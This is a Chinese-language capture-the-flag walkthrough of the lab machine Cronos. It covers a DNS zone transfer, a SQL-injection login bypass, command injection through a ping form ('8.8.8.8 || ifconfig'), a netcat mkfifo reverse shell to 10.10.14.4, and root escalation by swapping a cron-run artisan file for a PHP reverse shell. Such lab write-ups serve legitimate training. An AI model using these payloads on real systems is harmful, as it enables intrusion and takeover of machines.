使用Nmap对靶机进行端口嗅探，发现对外开放22、53、80端口，操作系统类型为Linux。

访问http://10.129.227.211/，为Apache的初始页面。

使用Dirsearch对http://10.129.227.211/进行扫描，未发现存在敏感目录。

对10.129.227.211IP进行反向解析，发现ns1.cronos.htbDNS服务器。

dig -x 10.129.227.211 @10.129.227.211

通过dig查看区域传输数据，发现以下域名信息。

dig axfr cronos.htb @10.129.227.211

admin.cronos.htbns1.cronos.htbwww.cronos.htbcronos.htb

将域名信息添加到/etc/hosts文件中。

访问http://www.cronos.htb，发现以下页面。

访问http://admin.cronos.htb/，发现以下页面。

最终在http://admin.cronos.htb/通过万能密码（admin'#）注入，成功进入。

进入后页面为ping或traceout的功能页面。

在功能页面中，输入8.8.8.8 || ifconfig，成功返回系统的ifconfig信息。

尝试反弹shell，在https://www.revshells.com/配置反弹shell信息，生成各种反弹shell语句。

尝试很多语句都失败了，最终通过以下语句成功反弹shell。

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.4 4444 >/tmp/f

执行whoami命令发现是www-data权限。

在/home/noulis/目录下成功获取user.txt。

查看计划任务列表发现存在/var/www/laravel/artisan文件，它具备计划任务权限，且为root执行权限，查看文件信息，其所属者为www-data。即我们可以通过计划任务来进行提权。

查看/var/www/laravel/artisan文件信息，发现为PHP脚本。

在Kali中找到PHP反弹shell脚本，更改反弹shell信息。

Kali使用Python开启临时web服务。

在靶机上使用wget下载PHP反弹shell脚本，并赋予执行权限，通过mv命令将其替换/var/www/laravel/artisan文件。

Kali开启监听，成功获取root权限的shell。

在/root/目录下成功获取root.txt。